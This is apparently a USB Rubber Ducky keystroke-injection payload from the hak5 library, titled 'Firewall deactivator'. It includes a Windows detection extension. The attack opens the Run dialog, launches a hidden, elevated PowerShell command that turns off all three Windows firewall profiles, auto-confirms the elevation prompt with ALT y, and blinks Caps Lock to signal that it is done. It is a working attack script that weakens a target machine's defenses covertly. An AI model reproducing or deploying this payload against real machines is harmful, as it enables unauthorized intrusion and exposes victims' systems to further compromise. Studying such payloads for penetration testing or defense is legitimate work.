GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Firewall_Deactivator/payload.txt
REM Title: Firewall deactivator
REM Author: luu176
REM Description: Deactivate all firewalls on a Windows machine using hidden PowerShell
REM Target: Windows

EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    $_OS = #NOT_WINDOWS

    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION

REM Open the Run dialog and start an elevated, hidden PowerShell that
REM disables the Domain, Public and Private firewall profiles
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
DELAY 800
REM Answer the elevation prompt raised by -Verb RunAs
ALT y
REM Toggle Caps Lock 9 times, then restore the original lock-key state
SAVE_HOST_KEYBOARD_LOCK_STATE
VAR $i = 0
WHILE ( $i < 9 )
    DELAY 150
    CAPSLOCK
    $i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE